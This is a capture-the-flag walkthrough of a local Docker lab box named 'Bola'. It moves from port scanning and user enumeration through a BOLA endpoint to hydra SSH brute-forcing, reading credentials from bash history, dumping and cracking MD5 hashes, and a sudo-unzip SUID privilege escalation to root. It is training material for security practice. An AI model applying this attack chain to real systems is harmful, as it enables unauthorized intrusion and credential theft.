Bola
Let's Download and start the Docker container
Reconnaissance
┌──(zwique㉿zwique)-[~/Downloads]
└─$ nmap -sV -A 172.17.0.2
Starting Nmap 7.95 ( https://nmap.org/ ) at 2025-07-14 14:04 +08
Nmap scan report for 172.17.0.2
Host is up (0.0000070s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u6 (protocol 2.0)
| ssh-hostkey:
| 256 4f:3f:8c:fb:88:da:ea:37:d6:9f:c3:bd:f4:8e:18:1b (ECDSA)
|_ 256 2e:a1:36:ff:8b:bb:0d:b3:c8:cb:4a:81:cb:37:77:31 (ED25519)
12345/tcp open http Werkzeug httpd 2.2.2 (Python 3.11.2)
|_http-server-header: Werkzeug/2.2.2 Python/3.11.2
|_http-title: Site doesn't have a title (application/json).
MAC Address: 02:42:AC:11:00:02 (Unknown)
Device type: general purpose|router
Running: Linux 4.X|5.X, MikroTik RouterOS 7.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3
OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.01 ms 172.17.0.2
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.43 secondsWe'll find two open ports. http://172.17.0.2:12345 connect to http. Since it showed me nothing, I decided to search hidden directories using dirsearch.
┌──(zwique㉿zwique)-[~/Downloads]
└─$ dirsearch -u http://172.17.0.2:12345/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkgresources import DistributionNotFound, VersionConflict
|. | v0.4.3
(| ) (/(_ (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /home/zwique/Downloads/reports/http_172.17.0.2_12345/__25-07-14_14-07-06.txt
Target: http://172.17.0.2:12345/
[14:07:06] Starting:
[14:07:26] 400 - 167B - /console
[14:07:34] 405 - 153B - /login
[14:07:48] 308 - 245B - /user -> http://172.17.0.2:12345/user/
[14:07:48] 400 - 54B - /user/
[14:07:48] 200 - 73B - /user/3
[14:07:48] 200 - 69B - /user/1
[14:07:48] 200 - 65B - /user/2
Task CompletedGreat, we've just found the json list of users. So here is the idea of getting access.
Exploit
Taking every username listed in json form
Bruteforcing their passwords on SSH port using hydra
Here is the python script that allows you to get list of usernames.
import requests
base_url = "http://172.17.0.2:12345/user/"
timeout_ids = 10
current_id = 1
failures = 0
with open("users.txt", "w") as f:
while failures < timeout_ids:
url = f"{base_url}{current_id}"
response = requests.get(url)
if response.status_code == 200:
try:
data = response.json()
username = data.get("username")
if username:
print(f"[{current_id}] username: {username}")
f.write(username + "\n")
failures = 0
else:
print(f"[{current_id}] No username in response.")
failures += 1
except Exception as e:
print(f"[{current_id}] Invalid JSON: {e}")
failures += 1
else:
print(f"[{current_id}] No user (status {response.status_code})")
failures += 1
current_id += 1hydra -L users.txt ssh://172.17.0.2 -P /usr/share/wordlists/rockyou.txt
[22][ssh] host: 172.17.0.2 login: steven password: stevenLogin as steven user using SSH. steven@172.17.0.2 Then I ran linpeas.sh tool in order to find any useful information. Then, it seemed that .bash_history file contained vaild information.
steven@7460f532dd7d:~$ cat .bash_history
mysql -y steven -psteven
mysql -u steven -psteven
exit
mysql -u steven -psteven
exit
ls
unzip secretitosecretazo.zip
ls
cp secretitosecretazo.zip /home
ls
exit
sudo -l
cd /home
ls
exitmysql -u steven -psteven
SHOW DATABASES;
USE secretito;
SELECT * FROM secretito;
MariaDB [secretito]> SELECT * FROM usuarios;
+----+-----------+----------------------------------+
| id | usuario | password |
+----+-----------+----------------------------------+
| 1 | alice | 8bdffaa69d328c1d4ae3aeadc97de223 |
| 2 | bob | d8578edf8458ce06fbc5bb76a58c5ca4 |
| 3 | charlie | e99a18c428cb38d5f260853678922e03 |
| 4 | baluadmin | aa87ddc5b4c24406d26ddad771ef44b0 |
| 5 | diana | e10adc3949ba59abbe56e057f20f883e |
+----+-----------+----------------------------------+
5 rows in set (0.002 sec)Very well!!! We've just found MD-5 hashed passwords of users. Crack the hashes using john/hashcat or even CrackStation.
The one user containing suspicious key word is baluadmin.balueadmin:estrella
After logging in as bluadmin, I've checked what are sudo command I'm allowed to run without any password of root.
baluadmin@7460f532dd7d:~$ sudo -l
Matching Defaults entries for baluadmin on 7460f532dd7d:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin,
use_pty
User baluadmin may run the following commands on 7460f532dd7d:
(ALL) NOPASSWD: /usr/bin/unzipRoot
baluadmin@1f62a5cad7a9:~$ cp /bin/sh .
baluadmin@1f62a5cad7a9:~$ chmod +s sh
baluadmin@1f62a5cad7a9:~$ zip shell.zip sh
adding: sh (deflated 52%)
baluadmin@1f62a5cad7a9:~$ sudo unzip -K shell.zip
Archive: shell.zip
replace sh? [y]es, [n]o, [A]ll, [N]one, [r]ename: y
inflating: sh
baluadmin@1f62a5cad7a9:~$ ./sh -p
id
uid=1001(baluadmin) gid=1001(baluadmin) euid=0(root) egid=0(root) groups=0(root),100(users),1001(baluadmin)
#GG. Since it was interesting for me to find out what was inside secretitosecretazo.zip file, I extracted it as a root.
cd /
ls
bin etc lib64 opt rootshell.sh secretitosecretazo.zip tmp
boot home media proc run srv usr
dev lib mnt root sbin sys var
unzip secretitosecretazo.zip
Archive: secretitosecretazo.zip
extracting: sorpresitajiji.txt
cat sorpresitajiji.txt
root:pedazodepasswordchaval
#Last updated